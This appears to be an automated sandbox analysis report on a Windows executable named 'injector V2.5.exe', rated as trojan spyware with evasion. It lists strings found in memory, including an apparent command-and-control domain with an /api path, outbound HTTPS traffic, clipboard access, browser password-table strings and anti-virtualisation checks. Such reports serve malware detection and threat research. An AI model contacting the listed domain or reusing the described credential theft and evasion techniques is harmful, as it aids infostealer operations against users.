              Source: injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: injector V2.5.exe, 00000002.00000002.1930206544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1924998682.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1924998682.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799048884.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1925547199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902129361.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1872564200.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799214621.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1930155911.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902620677.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799241711.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799418781.0000000005AED000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1926539223.00000000033DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/
              Source: injector V2.5.exe, 00000002.00000003.1799214621.00000000033D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/OT
              Source: injector V2.5.exe, 00000002.00000003.1923653498.0000000003361000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1873674145.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902129361.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902650994.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1929912011.0000000003361000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902597448.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799214621.00000000033D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/api
              Source: injector V2.5.exe, 00000002.00000003.1923653498.000000000337E000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1929912011.000000000337E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/apir
              Source: injector V2.5.exe, 00000002.00000003.1902012825.00000000033E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/api~
              Source: injector V2.5.exe, 00000002.00000003.1798953231.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776244127.00000000033EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/r
              Source: injector V2.5.exe, 00000002.00000003.1902620677.00000000033D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/t?
              Source: injector V2.5.exe, 00000002.00000003.1923653498.000000000337E000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902597448.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902012825.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1929912011.000000000337E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs:443/api
              Source: injector V2.5.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: injector V2.5.exe, 00000002.00000003.1776917061.0000000005B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: injector V2.5.exe, 00000002.00000003.1822505611.0000000005C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: injector V2.5.exe, 00000002.00000003.1822505611.0000000005C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: injector V2.5.exe, 00000002.00000003.1799004611.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799257320.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1798838778.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776917061.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1777081480.0000000005B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: injector V2.5.exe, 00000002.00000003.1777081480.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: injector V2.5.exe, 00000002.00000003.1799004611.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799257320.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1798838778.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776917061.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1777081480.0000000005B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: injector V2.5.exe, 00000002.00000003.1777081480.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: injector V2.5.exe, 00000002.00000003.1822505611.0000000005C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: injector V2.5.exe, 00000002.00000003.1822505611.0000000005C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: injector V2.5.exe, 00000002.00000003.1822505611.0000000005C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: injector V2.5.exe, 00000002.00000003.1822505611.0000000005C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: injector V2.5.exe, 00000002.00000003.1822505611.0000000005C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 104.21.43.198:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00434B70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00434B70
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00434B70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00434B70
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B3D4A00_2_00B3D4A0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B44CD00_2_00B44CD0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B46CD00_2_00B46CD0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B34CC00_2_00B34CC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B468000_2_00B46800
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B334400_2_00B33440
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B478400_2_00B47840
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B355F00_2_00B355F0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B259300_2_00B25930
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B41D300_2_00B41D30
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B381290_2_00B38129
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B349100_2_00B34910
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B3DD000_2_00B3DD00
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B441700_2_00B44170
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2B9640_2_00B2B964
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B32AE70_2_00B32AE7
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B55E220_2_00B55E22
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B39B800_2_00B39B80
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B33F800_2_00B33F80
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B363300_2_00B36330
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B473300_2_00B47330
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B35F600_2_00B35F60
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B413670_2_00B41367
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2A36B0_2_00B2A36B
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B37F540_2_00B37F54
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B3F3400_2_00B3F340
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040A4672_2_0040A467
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004280D02_2_004280D0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043C4902_2_0043C490
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004421402_2_00442140
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040DD2B2_2_0040DD2B
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004251E02_2_004251E0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00409D802_2_00409D80
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004212302_2_00421230
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00439B702_2_00439B70
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040DB172_2_0040DB17
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00408FA02_2_00408FA0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004233B02_2_004233B0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004050362_2_00405036
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040B0802_2_0040B080
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004200902_2_00420090
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004064B02_2_004064B0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040D4B92_2_0040D4B9
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004099402_2_00409940
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00425D402_2_00425D40
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040B5502_2_0040B550
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043C9102_2_0043C910
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004285302_2_00428530
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004091D02_2_004091D0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004039802_2_00403980
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004391902_2_00439190
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00407AE02_2_00407AE0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004052E92_2_004052E9
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004202F02_2_004202F0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00441A902_2_00441A90
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00406B402_2_00406B40
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041F7402_2_0041F740
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004403002_2_00440300
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043A7202_2_0043A720
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043FF202_2_0043FF20
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00438F302_2_00438F30
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00406FD02_2_00406FD0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00405FF02_2_00405FF0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00402F802_2_00402F80
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B3C0A02_2_00B3C0A0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B210002_2_00B21000
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B468002_2_00B46800
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B478402_2_00B47840
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B301902_2_00B30190
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2A1802_2_00B2A180
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B259302_2_00B25930
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B349102_2_00B34910
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B441702_2_00B44170
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B32AA02_2_00B32AA0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B39B802_2_00B39B80
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B37BD02_2_00B37BD0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B363302_2_00B36330
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B473302_2_00B47330
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B3F3402_2_00B3F340
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B3D4A02_2_00B3D4A0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B44CD02_2_00B44CD0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B46CD02_2_00B46CD0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B2CCC02_2_00B2CCC0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B334402_2_00B33440
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B355F02_2_00B355F0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B255402_2_00B25540
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B55E222_2_00B55E22
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B3DE702_2_00B3DE70
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B23E602_2_00B23E60
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B33F802_2_00B33F80
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B35F602_2_00B35F60
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: String function: 00B4CAF8 appears 35 times
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: String function: 00B49890 appears 63 times
              Source: injector V2.5.exeStatic PE information: invalid certificate
              Source: injector V2.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: injector V2.5.exeStatic PE information: Section: .coS ZLIB complexity 1.0003350020226538
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@3/2
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00439B70 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00439B70
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:120:WilError_03
              Source: injector V2.5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\injector V2.5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: injector V2.5.exe, 00000002.00000003.1798884983.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: injector V2.5.exeReversingLabs: Detection: 34%
              Source: C:\Users\user\Desktop\injector V2.5.exeFile read: C:\Users\user\Desktop\injector V2.5.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\injector V2.5.exe "C:\Users\user\Desktop\injector V2.5.exe"
              Source: C:\Users\user\Desktop\injector V2.5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\injector V2.5.exeProcess created: C:\Users\user\Desktop\injector V2.5.exe "C:\Users\user\Desktop\injector V2.5.exe"
              Source: C:\Users\user\Desktop\injector V2.5.exeProcess created: C:\Users\user\Desktop\injector V2.5.exe "C:\Users\user\Desktop\injector V2.5.exe"Jump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: injector V2.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: injector V2.5.exeStatic PE information: section name: .00cfg
              Source: injector V2.5.exeStatic PE information: section name: .coS
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B500FA push ecx; ret 0_2_00B5010D
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B500FA push ecx; ret 2_2_00B5010D
              Source: injector V2.5.exeStatic PE information: section name: .text entropy: 6.9570693373870895
              Source: C:\Users\user\Desktop\injector V2.5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\injector V2.5.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeAPI coverage: 9.0 %
              Source: C:\Users\user\Desktop\injector V2.5.exe TID: 5932Thread sleep time: -270000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B4F680 FindFirstFileExW,0_2_00B4F680
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00B4F731
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B4F680 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00B4F680
              Source: injector V2.5.exe, 00000002.00000003.1923653498.000000000334C000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1923653498.000000000337E000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1929912011.000000000337E000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902650994.000000000337D000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1929912011.000000000334C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\injector V2.5.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043E730 LdrInitializeThunk,2_2_0043E730
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B496AF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B496AF
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B5D18D mov edi, dword ptr fs:[00000030h]0_2_00B5D18D
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B2D475 mov edi, dword ptr fs:[00000030h]0_2_00B2D475
